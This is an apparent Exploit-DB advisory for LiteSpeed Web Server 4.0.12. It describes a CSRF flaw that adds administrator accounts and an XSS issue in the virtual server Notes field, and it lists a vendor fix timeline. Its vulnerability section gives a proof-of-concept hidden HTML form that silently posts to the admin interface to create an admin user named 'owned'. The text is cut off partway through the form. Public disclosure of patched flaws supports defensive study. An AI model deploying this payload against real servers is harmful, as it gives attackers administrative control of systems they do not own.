Litespeed Web Server 4.0.12 - Add Admin CSRF and XSS Vulnerabilities

ID EDB-ID:11503
Type exploitdb
Reporter d1dn0t
Modified 2010-02-19T00:00:00


Litespeed Web Server v4.0.12 (Add Admin) CSRF and XSS Vulnerabilities. Webapps exploit for php platform

                                            # Author: d1dn0t (didnot[at]me[dot]com)
# Software Link:
# Version: 4.0.12
# Greetz: Muts/Ryujin/Kernel_Saunders

[ 0x00 ] Product Description

LiteSpeed Web Server is the leading high-performance, high-scalability web
server. It is completely Apache interchangeable so LiteSpeed Web Server
can quickly replace a major bottleneck in your existing web delivery
platform. With its comprehensive range of features and easy-to-use
web administration console, LiteSpeed Web Server can help you
conquer the challenges of deploying an effective web serving architecture.

[ 0x01 ] Vulnerability Details

The Web based HTTP Admin interface is vulnerable to a CSRF exploit to
add additional admin users.
The admin interface also has XSS issues in the Notes field of the
Virtual Server configuration.

[ 0x02 ] Vulnerability Timeline

2010-02-04 Discovery
2010-02-04 Initial Disclosure to Vendor
2010-02-04 Vendor Response, fix in progress
2010-02-18 Vendor Fix Released

[ 0x03 ] Vulnerability

<form name="csrf" action=""
method="post" target="hidden">
<input type="hidden" name="a" value="s" />
<input type="hidden" name="m" value="admin" />
<input type="hidden" name="p" value="security" />
<input type="hidden" name="t" value="`ADMIN_USR_NEW" />
<input type="hidden" name="r" value="" />
<input type="hidden" name="file_create" value="" />
<input type="hidden" name="name" value="owned" />
<input type="hidden" name="pass" value="password" />
<input type="hidden" name="pass1" value="password" />